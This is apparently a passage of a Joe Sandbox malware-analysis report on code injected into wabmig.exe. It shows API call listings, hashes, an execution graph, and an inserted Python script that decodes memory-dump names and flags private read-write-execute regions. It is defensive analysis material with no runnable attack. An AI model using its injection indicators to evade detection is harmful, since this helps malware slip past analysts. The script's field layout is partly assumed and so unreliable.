                                                                            • GetLastError.KERNEL32(?,23235C88,23231D66,00000000,00000000,00000000,?,23235E85,00000006,FlsSetValue,2323E190,FlsSetValue,00000000,00000364,?,23235BC8), ref: 23235D1F
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,23235C88,23231D66,00000000,00000000,00000000,?,23235E85,00000006,FlsSetValue,2323E190,FlsSetValue,00000000), ref: 23235D2D
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 3177248105-0
                                                                            APIs
                                                                            • _free.LIBCMT ref: 2323655C
                                                                              • Part of subcall function 232362BC: IsProcessorFeaturePresent.KERNEL32(00000017,232362AB,00000000,?,?,?,?,00000016,?,?,232362B8,00000000,00000000,00000000,00000000,00000000), ref: 232362BE
                                                                              • Part of subcall function 232362BC: GetCurrentProcess.KERNEL32(C0000417), ref: 232362E0
                                                                              • Part of subcall function 232362BC: TerminateProcess.KERNEL32(00000000), ref: 232362E7
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                            • String ID: *?$.
                                                                            • API String ID: 2667617558-3972193922
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: : $Se.
                                                                            • API String ID: 4218353326-4089948878
                                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                            • Instruction ID: 1a1808e0c6c905906fd40e134cb264d56208bb3665e0e901f06359912ad21bef
                                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                            • Instruction Fuzzy Hash: 3811C8B6A043496EC710DFA8DC40BDDFBFC9F1A204F1440D6E545E7212E67066428765
                                                                            APIs
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 23232903
                                                                              • Part of subcall function 232335D2: RaiseException.KERNEL32(?,?,?,23232925,00000000,00000000,00000000,?,?,?,?,?,23232925,?,232421B8), ref: 23233632
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 23232920
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                            • String ID: Unknown exception
                                                                            • API String ID: 3476068407-410509341
                                                                            • Opcode ID: 6e9e2ca29f96b6e284dd853c0c828bfe59dffc7cdefe8622fa582220b5904338
                                                                            • Instruction ID: 99dcf8d8b4e05a700a39d03e345a8893364af76aadbb8955d4a846b6af1ef986
                                                                            • Opcode Fuzzy Hash: 6e9e2ca29f96b6e284dd853c0c828bfe59dffc7cdefe8622fa582220b5904338
                                                                            • Instruction Fuzzy Hash: 26F022B4A2430D778B04B6A5EC449AD776C9F13A50BA041F1EB24D6491EBB0FAD6C5D0
                                                                            APIs
                                                                            • GetOEMCP.KERNEL32(00000000,?,?,23236C7C,?), ref: 23236A1E
                                                                            • GetACP.KERNEL32(00000000,?,?,23236C7C,?), ref: 23236A35
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: |l##
                                                                            • API String ID: 0-1571746927
                                                                            • Opcode ID: ff7fea0ee0444ca53a11f31d0a0bd104601b74c063251bd7d0bebb38a37e2ecc
                                                                            • Instruction ID: 52f4c81e1529e28b40e19dfc51854809000e1de3a25f55ee7f8721977bbb758e
                                                                            • Opcode Fuzzy Hash: ff7fea0ee0444ca53a11f31d0a0bd104601b74c063251bd7d0bebb38a37e2ecc
                                                                            • Instruction Fuzzy Hash: 8CF04FB05006098BD710EBA4D98C7AC7778FB12335F288385EA788A1D1DB759995CB45
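The Source File and Associated names above (for example 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp) say where in the wabmig.exe process the dumped code lived. The decoder below is an added example, not part of the Joe Sandbox report or its tooling: it splits the name and reads the fifth, sixth and seventh fields as the Windows MEMORY_BASIC_INFORMATION protection, state and type constants (0x40 = PAGE_EXECUTE_READWRITE, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE). That the first field is the process id, the second the analysis stage, the third a dump counter and the eighth reserved is my assumption, checked only against the snapshot name on the page (hcaresult_12_2_23230000_wabmig, i.e. pid 12, stage 2, base 0x23230000), not against a documented format.

```python
# Added example: decode a Joe Sandbox .sdmp memory-dump file name.
# Field layout (pid.stage.dump_id.base.protect.state.type.reserved) is an
# assumption cross-checked against hcaresult_12_2_23230000_wabmig; the three
# flag fields are standard Windows MEMORY_BASIC_INFORMATION constants.

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PROTECT_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}


def decode_protect(value):
    """Name the base protection in the low byte plus any modifier bits."""
    base = value & 0xFF
    names = [PAGE_PROTECT.get(base, f"0x{base:x}")]
    names += [name for bit, name in PROTECT_MODIFIERS.items() if value & bit]
    return "|".join(names)


def parse_dump_name(name):
    """Split an .sdmp name into its fields and flag whether the region is
    committed, private (not backed by an image file), writable and executable:
    the shape of unpacked or injected code rather than a loaded module."""
    stem = name[: -len(".sdmp")] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(fields)}: {name}")
    pid_hex, stage_hex, dump_id, base_hex, protect_hex, state_hex, type_hex, _reserved = fields
    protect = int(protect_hex, 16)
    state = int(state_hex, 16)
    mem_type = int(type_hex, 16)
    base_protect = protect & 0xFF
    return {
        "pid": int(pid_hex, 16),        # assumption: process id in hex (0xC -> 12)
        "stage": int(stage_hex, 16),    # assumption: analysis stage (the _2_ in the snapshot name)
        "dump_id": int(dump_id),        # assumption: decimal dump counter
        "base": int(base_hex, 16),      # region base address
        "protect": decode_protect(protect),
        "state": MEM_STATE.get(state, state_hex),
        "type": MEM_TYPE.get(mem_type, type_hex),
        "rwx_private": (base_protect in EXECUTABLE and base_protect in WRITABLE
                        and state == 0x1000 and mem_type == 0x20000),
    }


if __name__ == "__main__":
    # The two names quoted in this report section.
    for dump in (
        "0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp",
        "0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp",
    ):
        info = parse_dump_name(dump)
        print(f"pid {info['pid']} base 0x{info['base']:x} {info['protect']} "
              f"{info['state']} {info['type']} rwx_private={info['rwx_private']}")
```

For the dump the IDA plugin entries were taken from, the region at 0x23231000 comes out as committed private PAGE_EXECUTE_READWRITE memory: code that was written into wabmig.exe at run time rather than loaded from a module on disk, which is the reason the report can say "based on PE: true" for an address that belongs to no mapped image. The neighbouring 0x23230000 dump is PAGE_READWRITE, the header page of the same unpacked PE.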

                                                                            Execution Graph

                                                                            Execution Coverage:6.3%
                                                                            Dynamic/Decrypted Code Coverage:9.2%
                                                                            Signature Coverage:1.5%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:74
                                                                            execution_graph 37604 4466f4 37623 446904 37604->37623 37606 446700 GetModuleHandleA 37609 446710 __set_app_type __p__fmode __p__commode 37606->37609 37608 4467a4 37610 4467ac __setusermatherr 37608->37610 37611 4467b8 37608->37611 37609->37608 37610->37611 37624 4468f0 _controlfp 37611->37624 37613 4467bd _initterm __wgetmainargs _initterm 37614 44681e GetStartupInfoW 37613->37614 37615 446810 37613->37615 37617 446866 GetModuleHandleA 37614->37617 37625 41276d 37617->37625 37621 446896 exit 37622 44689d _cexit 37621->37622 37622->37615 37623->37606 37624->37613 37626 41277d 37625->37626 37668 4044a4 LoadLibraryW 37626->37668 37628 412785 37629 412789 37628->37629 37676 414b81 37628->37676 37629->37621 37629->37622 37632 4127c8 37682 412465 memset ??2@YAPAXI 37632->37682 37634 4127ea 37694 40ac21 37634->37694 37639 412813 37712 40dd07 memset 37639->37712 37640 412827 37717 40db69 memset 37640->37717 37643 412822 37738 4125b6 ??3@YAXPAX 37643->37738 37645 40ada2 _wcsicmp 37647 41283d 37645->37647 37647->37643 37650 412863 CoInitialize 37647->37650 37722 41268e 37647->37722 37742 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37650->37742 37652 41296f 37744 40b633 37652->37744 37654 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37660 412957 CoUninitialize 37654->37660 37663 4128ca 37654->37663 37660->37643 37661 4128d0 TranslateAcceleratorW 37662 412941 GetMessageW 37661->37662 37661->37663 37662->37660 37662->37661 37663->37661 37664 412909 IsDialogMessageW 37663->37664 37665 4128fd IsDialogMessageW 37663->37665 37666 41292b TranslateMessage DispatchMessageW 37663->37666 37667 41291f IsDialogMessageW 37663->37667 37664->37662 37664->37663 37665->37662 37665->37664 37666->37662 37667->37662 37667->37666 37669 4044cf GetProcAddress 37668->37669 37672 4044f7 37668->37672 37670 4044e8 FreeLibrary 37669->37670 37673 4044df 37669->37673 
37671 4044f3 37670->37671 37670->37672 37671->37672 37674 404507 MessageBoxW 37672->37674 37675 40451e 37672->37675 37673->37670 37674->37628 37675->37628 37677 414b8a 37676->37677 37678 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37676->37678 37748 40a804 memset 37677->37748 37678->37632 37681 414b9e GetProcAddress 37681->37678 37683 4124e0 37682->37683 37684 412505 ??2@YAPAXI 37683->37684 37685 41251c 37684->37685 37687 412521 37684->37687 37770 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37685->37770 37759 444722 37687->37759 37693 41259b wcscpy 37693->37634 37775 40b1ab free free 37694->37775 37698 40a9ce malloc memcpy free free 37705 40ac5c 37698->37705 37699 40ad4b 37707 40ad76 37699->37707 37799 40a9ce 37699->37799 37701 40ace7 free 37701->37705 37705->37698 37705->37699 37705->37701 37705->37707 37779 40a8d0 37705->37779 37791 4099f4 37705->37791 37706 40a8d0 7 API calls 37706->37707 37776 40aa04 37707->37776 37708 40ada2 37709 40adc9 37708->37709 37710 40adaa 37708->37710 37709->37639 37709->37640 37710->37709 37711 40adb3 _wcsicmp 37710->37711 37711->37709 37711->37710 37804 40dce0 37712->37804 37714 40dd3a GetModuleHandleW 37809 40dba7 37714->37809 37718 40dce0 3 API calls 37717->37718 37719 40db99 37718->37719 37881 40dae1 37719->37881 37895 402f3a 37722->37895 37724 412766 37724->37643 37724->37650 37725 4126d3 _wcsicmp 37726 4126a8 37725->37726 37726->37724 37726->37725 37728 41270a 37726->37728 37929 4125f8 7 API calls 37726->37929 37728->37724 37898 411ac5 37728->37898 37739 4125da 37738->37739 37740 4125f0 37739->37740 37741 4125e6 DeleteObject 37739->37741 37743 40b1ab free free 37740->37743 37741->37740 37742->37654 37743->37652 37745 40b640 37744->37745 37746 40b639 free 37744->37746 37747 40b1ab free free 37745->37747 37746->37745 37747->37629 37749 40a83b GetSystemDirectoryW 37748->37749 37750 40a84c wcscpy 37748->37750 37749->37750 37755 409719 wcslen 37750->37755 37753 40a881 LoadLibraryW 37754 40a886 37753->37754 
37754->37678 37754->37681 37756 409724 37755->37756 37757 409739 wcscat LoadLibraryW 37755->37757 37756->37757 37758 40972c wcscat 37756->37758 37757->37753 37757->37754 37758->37757 37760 444732 37759->37760 37761 444728 DeleteObject 37759->37761 37771 409cc3 37760->37771 37761->37760 37763 412551 37764 4010f9 37763->37764 37765 401130 37764->37765 37766 401134 GetModuleHandleW LoadIconW 37765->37766 37767 401107 wcsncat 37765->37767 37768 40a7be 37766->37768 37767->37765 37769 40a7d2 37768->37769 37769->37693 37769->37769 37770->37687 37774 409bfd memset wcscpy 37771->37774 37773 409cdb CreateFontIndirectW 37773->37763 37774->37773 37775->37705 37777 40aa14 37776->37777 37778 40aa0a free 37776->37778 37777->37708 37778->37777 37780 40a8eb 37779->37780 37781 40a8df wcslen 37779->37781 37782 40a906 free 37780->37782 37783 40a90f 37780->37783 37781->37780 37784 40a919 37782->37784 37785 4099f4 3 API calls 37783->37785 37786 40a932 37784->37786 37787 40a929 free 37784->37787 37785->37784 37789 4099f4 3 API calls 37786->37789 37788 40a93e memcpy 37787->37788 37788->37705 37790 40a93d 37789->37790 37790->37788 37792 409a41 37791->37792 37793 4099fb malloc 37791->37793 37792->37705 37795 409a37 37793->37795 37796 409a1c 37793->37796 37795->37705 37797 409a30 free 37796->37797 37798 409a20 memcpy 37796->37798 37797->37795 37798->37797 37800 40a9e7 37799->37800 37801 40a9dc free 37799->37801 37802 4099f4 3 API calls 37800->37802 37803 40a9f2 37801->37803 37802->37803 37803->37706 37828 409bca GetModuleFileNameW 37804->37828 37806 40dce6 wcsrchr 37807 40dcf5 37806->37807 37808 40dcf9 wcscat 37806->37808 37807->37808 37808->37714 37829 44db70 37809->37829 37813 40dbfd 37832 4447d9 37813->37832 37816 40dc34 wcscpy wcscpy 37858 40d6f5 37816->37858 37817 40dc1f wcscpy 37817->37816 37820 40d6f5 3 API calls 37821 40dc73 37820->37821 37822 40d6f5 3 API calls 37821->37822 37823 40dc89 37822->37823 37824 40d6f5 3 API calls 37823->37824 37825 40dc9c EnumResourceNamesW 
EnumResourceNamesW wcscpy 37824->37825 37864 40da80 37825->37864 37828->37806 37830 40dbb4 memset memset 37829->37830 37831 409bca GetModuleFileNameW 37830->37831 37831->37813 37834 4447f4 37832->37834 37833 40dc1b 37833->37816 37833->37817 37834->37833 37835 444807 ??2@YAPAXI 37834->37835 37836 44481f 37835->37836 37837 444873 _snwprintf 37836->37837 37838 4448ab wcscpy 37836->37838 37871 44474a 8 API calls 37837->37871 37840 4448bb 37838->37840 37872 44474a 8 API calls 37840->37872 37841 4448a7 37841->37838 37841->37840 37843 4448cd 37873 44474a 8 API calls 37843->37873 37845 4448e2 37874 44474a 8 API calls 37845->37874 37847 4448f7 37875 44474a 8 API calls 37847->37875 37849 44490c 37876 44474a 8 API calls 37849->37876 37851 444921 37877 44474a 8 API calls 37851->37877 37853 444936 37878 44474a 8 API calls 37853->37878 37855 44494b 37879 44474a 8 API calls 37855->37879 37857 444960 ??3@YAXPAX 37857->37833 37859 44db70 37858->37859 37860 40d702 memset GetPrivateProfileStringW 37859->37860 37861 40d752 37860->37861 37862 40d75c WritePrivateProfileStringW 37860->37862 37861->37862 37863 40d758 37861->37863 37862->37863 37863->37820 37865 44db70 37864->37865 37866 40da8d memset 37865->37866 37867 40daac LoadStringW 37866->37867 37868 40dac6 37867->37868 37868->37867 37870 40dade 37868->37870 37880 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37868->37880 37870->37643 37871->37841 37872->37843 37873->37845 37874->37847 37875->37849 37876->37851 37877->37853 37878->37855 37879->37857 37880->37868 37891 409b98 GetFileAttributesW 37881->37891 37883 40daea 37884 40db63 37883->37884 37885 40daef wcscpy wcscpy GetPrivateProfileIntW 37883->37885 37884->37645 37892 40d65d GetPrivateProfileStringW 37885->37892 37887 40db3e 37893 40d65d GetPrivateProfileStringW 37887->37893 37889 40db4f 37894 40d65d GetPrivateProfileStringW 37889->37894 37891->37883 37892->37887 37893->37889 37894->37884 37930 40eaff 37895->37930 37899 411ae2 memset 
37898->37899 37900 411b8f 37898->37900 37970 409bca GetModuleFileNameW 37899->37970 37912 411a8b 37900->37912 37902 411b0a wcsrchr 37903 411b22 wcscat 37902->37903 37904 411b1f 37902->37904 37971 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37903->37971 37904->37903 37906 411b67 37972 402afb 37906->37972 37910 411b7f 38028 40ea13 SendMessageW memset SendMessageW 37910->38028 37913 402afb 27 API calls 37912->37913 37914 411ac0 37913->37914 37915 4110dc 37914->37915 37916 41113e 37915->37916 37921 4110f0 37915->37921 38053 40969c LoadCursorW SetCursor 37916->38053 37918 411143 38054 4032b4 37918->38054 38072 444a54 37918->38072 37919 4110f7 _wcsicmp 37919->37921 37920 411157 37922 40ada2 _wcsicmp 37920->37922 37921->37916 37921->37919 38075 410c46 10 API calls 37921->38075 37925 411167 37922->37925 37923 4111af 37925->37923 37926 4111a6 qsort 37925->37926 37926->37923 37929->37726 37931 40eb10 37930->37931 37943 40e8e0 37931->37943 37934 40eb6c memcpy memcpy 37935 40ebb7 37934->37935 37935->37934 37936 40ebf2 ??2@YAPAXI ??2@YAPAXI 37935->37936 37939 40d134 16 API calls 37935->37939 37937 40ec2e ??2@YAPAXI 37936->37937 37940 40ec65 37936->37940 37937->37940 37939->37935 37940->37940 37953 40ea7f 37940->37953 37942 402f49 37942->37726 37944 40e8f2 37943->37944 37945 40e8eb ??3@YAXPAX 37943->37945 37946 40e900 37944->37946 37947 40e8f9 ??3@YAXPAX 37944->37947 37945->37944 37948 40e90a ??3@YAXPAX 37946->37948 37950 40e911 37946->37950 37947->37946 37948->37950 37949 40e931 ??2@YAPAXI ??2@YAPAXI 37949->37934 37950->37949 37951 40e921 ??3@YAXPAX 37950->37951 37952 40e92a ??3@YAXPAX 37950->37952 37951->37952 37952->37949 37954 40aa04 free 37953->37954 37955 40ea88 37954->37955 37956 40aa04 free 37955->37956 37957 40ea90 37956->37957 37958 40aa04 free 37957->37958 37959 40ea98 37958->37959 37960 40aa04 free 37959->37960 37961 40eaa0 37960->37961 37962 40a9ce 4 API calls 37961->37962 37963 40eab3 37962->37963 37964 40a9ce 4 API calls 37963->37964 37965 40eabd 
37964->37965 37966 40a9ce 4 API calls 37965->37966 37967 40eac7 37966->37967 37968 40a9ce 4 API calls 37967->37968 37969 40ead1 37968->37969 37969->37942 37970->37902 37971->37906 38029 40b2cc 37972->38029 37974 402b0a 37975 40b2cc 27 API calls 37974->37975 37976 402b23 37975->37976 37977 40b2cc 27 API calls 37976->37977 37978 402b3a 37977->37978 37979 40b2cc 27 API calls 37978->37979 37980 402b54 37979->37980 37981 40b2cc 27 API calls 37980->37981 37982 402b6b 37981->37982 37983 40b2cc 27 API calls 37982->37983 37984 402b82 37983->37984 37985 40b2cc 27 API calls 37984->37985 37986 402b99 37985->37986 37987 40b2cc 27 API calls 37986->37987 37988 402bb0 37987->37988 37989 40b2cc 27 API calls 37988->37989 37990 402bc7 37989->37990 37991 40b2cc 27 API calls 37990->37991 37992 402bde 37991->37992 37993 40b2cc 27 API calls 37992->37993 37994 402bf5 37993->37994 37995 40b2cc 27 API calls 37994->37995 37996 402c0c 37995->37996 37997 40b2cc 27 API calls 37996->37997 37998 402c23 37997->37998 37999 40b2cc 27 API calls 37998->37999 38000 402c3a 37999->38000 38001 40b2cc 27 API calls 38000->38001 38002 402c51 38001->38002 38003 40b2cc 27 API calls 38002->38003 38004 402c68 38003->38004 38005 40b2cc 27 API calls 38004->38005 38006 402c7f 38005->38006 38007 40b2cc 27 API calls 38006->38007 38008 402c99 38007->38008 38009 40b2cc 27 API calls 38008->38009 38010 402cb3 38009->38010 38011 40b2cc 27 API calls 38010->38011 38012 402cd5 38011->38012 38013 40b2cc 27 API calls 38012->38013 38014 402cf0 38013->38014 38015 40b2cc 27 API calls 38014->38015 38016 402d0b 38015->38016 38017 40b2cc 27 API calls 38016->38017 38018 402d26 38017->38018 38019 40b2cc 27 API calls 38018->38019 38020 402d3e 38019->38020 38021 40b2cc 27 API calls 38020->38021 38022 402d59 38021->38022 38023 40b2cc 27 API calls 38022->38023 38024 402d78 38023->38024 38025 40b2cc 27 API calls 38024->38025 38026 402d93 38025->38026 38027 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics 
SetWindowPlacement 38026->38027 38027->37910 38028->37900 38032 40b58d 38029->38032 38031 40b2d1 38031->37974 38033 40b5a4 GetModuleHandleW FindResourceW 38032->38033 38034 40b62e 38032->38034 38035 40b5c2 LoadResource 38033->38035 38037 40b5e7 38033->38037 38034->38031 38036 40b5d0 SizeofResource LockResource 38035->38036 38035->38037 38036->38037 38037->38034 38045 40afcf 38037->38045 38039 40b608 memcpy 38048 40b4d3 memcpy 38039->38048 38041 40b61e 38049 40b3c1 18 API calls 38041->38049 38043 40b626 38050 40b04b 38043->38050 38046 40b04b ??3@YAXPAX 38045->38046 38047 40afd7 ??2@YAPAXI 38046->38047 38047->38039 38048->38041 38049->38043 38051 40b051 ??3@YAXPAX 38050->38051 38052 40b05f 38050->38052 38051->38052 38052->38034 38053->37918 38055 4032c4 38054->38055 38056 40b633 free 38055->38056 38057 403316 38056->38057 38076 44553b 38057->38076 38061 403480 38274 40368c 15 API calls 38061->38274 38063 403489 38064 40b633 free 38063->38064 38065 403495 38064->38065 38065->37920 38066 4033a9 memset memcpy 38067 4033ec wcscmp 38066->38067 38068 40333c 38066->38068 38067->38068 38068->38061 38068->38066 38068->38067 38272 4028e7 11 API calls 38068->38272 38273 40f508 6 API calls 38068->38273 38070 403421 _wcsicmp 38070->38068 38073 444a64 FreeLibrary 38072->38073 38074 444a83 38072->38074 38073->38074 38074->37920 38075->37921 38077 445548 38076->38077 38078 445599 38077->38078 38275 40c768 38077->38275 38079 4455a8 memset 38078->38079 38086 4457f2 38078->38086 38358 403988 38079->38358 38090 445854 38086->38090 38460 403e2d memset memset memset memset memset 38086->38460 38087 4458bb memset memset 38091 414c2e 16 API calls 38087->38091 38088 445672 38369 403fbe memset memset memset memset memset 38088->38369 38139 4458aa 38090->38139 38483 403c9c memset memset memset memset memset 38090->38483 38096 4458f9 38091->38096 38092 4455e5 38092->38088 38103 44560f 38092->38103 38093 44557a 38137 44558c 38093->38137 38555 4136c0 CoTaskMemFree 38093->38555 38095 44595e memset 
memset 38100 414c2e 16 API calls 38095->38100 38102 40b2cc 27 API calls 38096->38102 38098 445823 38144 4087b3 338 API calls 38098->38144 38163 445849 38098->38163 38099 445a00 memset memset 38506 414c2e 38099->38506 38101 44599c 38100->38101 38109 40b2cc 27 API calls 38101->38109 38110 445909 38102->38110 38112 4087b3 338 API calls 38103->38112 38105 445b38 memset memset memset 38114 445bd4 38105->38114 38115 445b98 38105->38115 38122 4459ac 38109->38122 38120 409d1f 6 API calls 38110->38120 38111 445c8b memset memset 38123 414c2e 16 API calls 38111->38123 38121 445621 38112->38121 38113 445585 38556 41366b FreeLibrary 38113->38556 38118 414c2e 16 API calls 38114->38118 38115->38114 38126 445ba2 38115->38126 38131 445be2 38118->38131 38119 403335 38271 4452e5 45 API calls 38119->38271 38134 445919 38120->38134 38557 4454bf 20 API calls 38121->38557 38135 409d1f 6 API calls 38122->38135 38136 445cc9 38123->38136 38125 445879 38156 4087b3 338 API calls 38125->38156 38178 44589f 38125->38178 38644 4099c6 wcslen 38126->38644 38127 4456b2 38559 40b1ab free free 38127->38559 38129 40b2cc 27 API calls 38140 445a4f 38129->38140 38142 40b2cc 27 API calls 38131->38142 38132 445d3d 38161 40b2cc 27 API calls 38132->38161 38133 445d88 memset memset memset 38145 414c2e 16 API calls 38133->38145 38573 409b98 GetFileAttributesW 38134->38573 38146 4459bc 38135->38146 38147 409d1f 6 API calls 38136->38147 38342 444b06 38137->38342 38139->38087 38162 44594a 38139->38162 38521 409d1f wcslen wcslen 38140->38521 38150 445bf3 38142->38150 38144->38098 38153 445dde 38145->38153 38640 409b98 GetFileAttributesW 38146->38640 38155 445ce1 38147->38155 38148 445bb3 38647 445403 memset 38148->38647 38160 409d1f 6 API calls 38150->38160 38151 445928 38151->38162 38574 40b6ef 38151->38574 38164 40b2cc 27 API calls 38153->38164 38664 409b98 GetFileAttributesW 38155->38664 38156->38125 38158 445680 38158->38127 38392 4087b3 memset 38158->38392 38159 40b2cc 27 API calls 38169 445a94 38159->38169 
38171 445c07 38160->38171 38172 445d54 _wcsicmp 38161->38172 38162->38095 38176 4459ed 38162->38176 38571 40b1ab free free 38163->38571 38175 445def 38164->38175 38165 4459cb 38165->38176 38186 40b6ef 252 API calls 38165->38186 38526 40ae18 38169->38526 38170 44566d 38170->38086 38443 413d4c 38170->38443 38182 445389 258 API calls 38171->38182 38183 445d71 38172->38183 38248 445d67 38172->38248 38174 445665 38558 40b1ab free free 38174->38558 38184 409d1f 6 API calls 38175->38184 38176->38099 38219 445b22 38176->38219 38177 445cf0 38177->38119 38177->38132 38177->38133 38572 40b1ab free free 38178->38572 38179 445389 258 API calls 38187 445bca 38179->38187 38189 445c17 38182->38189 38665 445093 23 API calls 38183->38665 38192 445e03 38184->38192 38186->38176 38187->38111 38187->38177 38188 4456d8 38194 40b2cc 27 API calls 38188->38194 38195 40b2cc 27 API calls 38189->38195 38191 44563c 38191->38174 38197 4087b3 338 API calls 38191->38197 38666 409b98 GetFileAttributesW 38192->38666 38193 40b6ef 252 API calls 38193->38119 38199 4456e2 38194->38199 38200 445c23 38195->38200 38196 445d83 38196->38119 38197->38191 38560 413fa6 _wcsicmp _wcsicmp 38199->38560 38204 409d1f 6 API calls 38200->38204 38202 445e12 38208 445e6b 38202->38208 38215 40b2cc 27 API calls 38202->38215 38206 445c37 38204->38206 38205 4456eb 38211 4456fd memset memset memset memset 38205->38211 38212 4457ea 38205->38212 38213 445389 258 API calls 38206->38213 38207 445b17 38641 40aebe 38207->38641 38668 445093 23 API calls 38208->38668 38561 409c70 wcscpy wcsrchr 38211->38561 38564 413d29 38212->38564 38218 445c47 38213->38218 38220 445e33 38215->38220 38216 445e7e 38222 445f67 38216->38222 38225 40b2cc 27 API calls 38218->38225 38219->38105 38219->38187 38226 409d1f 6 API calls 38220->38226 38231 40b2cc 27 API calls 38222->38231 38223 445ab2 memset 38227 40b2cc 27 API calls 38223->38227 38229 445c53 38225->38229 38230 445e47 38226->38230 38232 445aa1 38227->38232 38228 409c70 2 API calls 38233 44577e 
38228->38233 38234 409d1f 6 API calls 38229->38234 38667 409b98 GetFileAttributesW 38230->38667 38236 445f73 38231->38236 38232->38207 38232->38223 38237 409d1f 6 API calls 38232->38237 38533 40add4 38232->38533 38538 445389 38232->38538 38547 40ae51 38232->38547 38238 409c70 2 API calls 38233->38238 38239 445c67 38234->38239 38241 409d1f 6 API calls 38236->38241 38237->38232 38242 44578d 38238->38242 38243 445389 258 API calls 38239->38243 38240 445e56 38240->38208 38245 445e83 memset 38240->38245 38244 445f87 38241->38244 38242->38212 38250 40b2cc 27 API calls 38242->38250 38243->38187 38671 409b98 GetFileAttributesW 38244->38671 38249 40b2cc 27 API calls 38245->38249 38248->38119 38248->38193 38251 445eab 38249->38251 38252 4457a8 38250->38252 38253 409d1f 6 API calls 38251->38253 38254 409d1f 6 API calls 38252->38254 38255 445ebf 38253->38255 38256 4457b8 38254->38256 38257 40ae18 9 API calls 38255->38257 38563 409b98 GetFileAttributesW 38256->38563 38267 445ef5 38257->38267 38259 4457c7 38259->38212 38261 4087b3 338 API calls 38259->38261 38260 40ae51 9 API calls 38260->38267 38261->38212 38262 445f5c 38264 40aebe FindClose 38262->38264 38263 40add4 2 API calls 38263->38267 38264->38222 38265 40b2cc 27 API calls 38265->38267 38266 409d1f 6 API calls 38266->38267 38267->38260 38267->38262 38267->38263 38267->38265 38267->38266 38269 445f3a 38267->38269 38669 409b98 GetFileAttributesW 38267->38669 38670 445093 23 API calls 38269->38670 38271->38068 38272->38070 38273->38068 38274->38063 38276 40c775 38275->38276 38672 40b1ab free free 38276->38672 38278 40c788 38673 40b1ab free free 38278->38673 38280 40c790 38674 40b1ab free free 38280->38674 38282 40c798 38283 40aa04 free 38282->38283 38284 40c7a0 38283->38284 38675 40c274 memset 38284->38675 38289 40a8ab 9 API calls 38290 40c7c3 38289->38290 38291 40a8ab 9 API calls 38290->38291 38292 40c7d0 38291->38292 38704 40c3c3 38292->38704 38296 40c7e5 38297 40c877 38296->38297 38298 40c86c 38296->38298 38304 40c634 49 
